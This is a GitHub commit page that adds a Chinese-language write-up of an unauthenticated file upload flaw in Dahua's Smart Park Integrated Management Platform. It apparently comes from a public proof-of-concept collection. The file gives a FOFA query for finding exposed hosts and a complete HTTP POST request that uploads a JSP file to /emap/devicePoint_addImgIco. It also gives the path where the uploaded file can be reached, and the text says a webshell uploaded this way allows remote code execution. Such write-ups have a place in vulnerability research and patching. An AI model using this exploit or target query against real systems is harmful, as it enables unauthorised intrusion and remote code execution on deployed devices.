-
Notifications
You must be signed in to change notification settings - Fork 1.1k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
4 changed files
with
55 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
# 大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞 | ||
|
||
大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞,未经授权的攻击者可以上传恶意Webshell的JSP文件,可以进行RCE利用。 | ||
|
||
## fofa | ||
|
||
```javascript | ||
app="dahua-智慧园区综合管理平台" | ||
``` | ||
|
||
## poc | ||
|
||
```javascript | ||
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 | ||
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT | ||
User-Agent: Java/1.8.0_345 | ||
Host: | ||
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 | ||
Content-Length: 229 | ||
Connection: close | ||
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT | ||
Content-Disposition: form-data; name="upload"; filename="1.jsp" | ||
Content-Type: application/octet-stream | ||
Content-Transfer-Encoding: binary | ||
123456 | ||
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- | ||
``` | ||
data:image/s3,"s3://crabby-images/b151d/b151d95c053a3c7517d4bd30a4aec871913c5162" alt="image-20241008142600054" | ||
文件路径 `http://ip:port/upload/emap/society_new/`+文件名 |